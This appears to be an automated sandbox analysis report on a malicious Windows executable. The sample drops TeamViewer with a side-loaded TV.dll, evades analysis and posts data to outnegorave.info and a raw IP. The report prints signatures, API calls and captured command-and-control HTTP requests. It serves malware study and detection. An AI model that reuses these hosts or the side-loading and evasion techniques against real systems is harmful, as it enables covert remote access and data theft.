Windows Analysis Report 77Etc0bR2v.exe

Overview

General Information

Sample Name: 77Etc0bR2v.exe
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exe, HartexLLC, signed, soldewornek
Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locale information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file name is different from the original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

AV Detection:

Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll ReversingLabs: Detection: 26%
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8, 3_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8, 3_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_006F605B CryptReleaseContext, 3_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: msimg32.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll

Compliance:

Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6F3328B0

Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    POST /B8C631A8/ HTTP/1.1
    Content-Length: 87812
    Content-Type: multipart/form-data; boundary=--------2771230636
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: outnegorave.info
    Connection: Close
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /B8C631A8/ HTTP/1.1
    Content-Length: 90555
    Content-Type: multipart/form-data; boundary=--------2341619378
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: outnegorave.info
    Connection: Close
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /B8C631A8/ HTTP/1.1
    Content-Length: 86397
    Content-Type: multipart/form-data; boundary=--------1750076427
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: outnegorave.info
    Connection: Close
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=32172978&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 37.252.232.109
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /dout.aspx?s=12852408&p=10000001&client=DynGate HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 37.252.232.109
    Content-Length: 3
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    POST /dout.aspx?s=12852408&p=10000002&client=DynGate HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 37.252.232.109
    Content-Length: 500000
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: 37.252.232.109
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown TCP traffic detected without corresponding DNS query: 37.252.232.109
Source: svchost.exe, 0000000E.00000003.479875283.000001C495993000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV"," equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detec equals www.youtube.com (Youtube)
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/32172969&client=DynGate&p=10000002v
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412486792.00000000056C9000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001l
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmp String found in binary or memory: http://37.252.232.109/din.aspx?s=00000000&m=fast&client=DynGate&rnd=197887096&p=10000001q
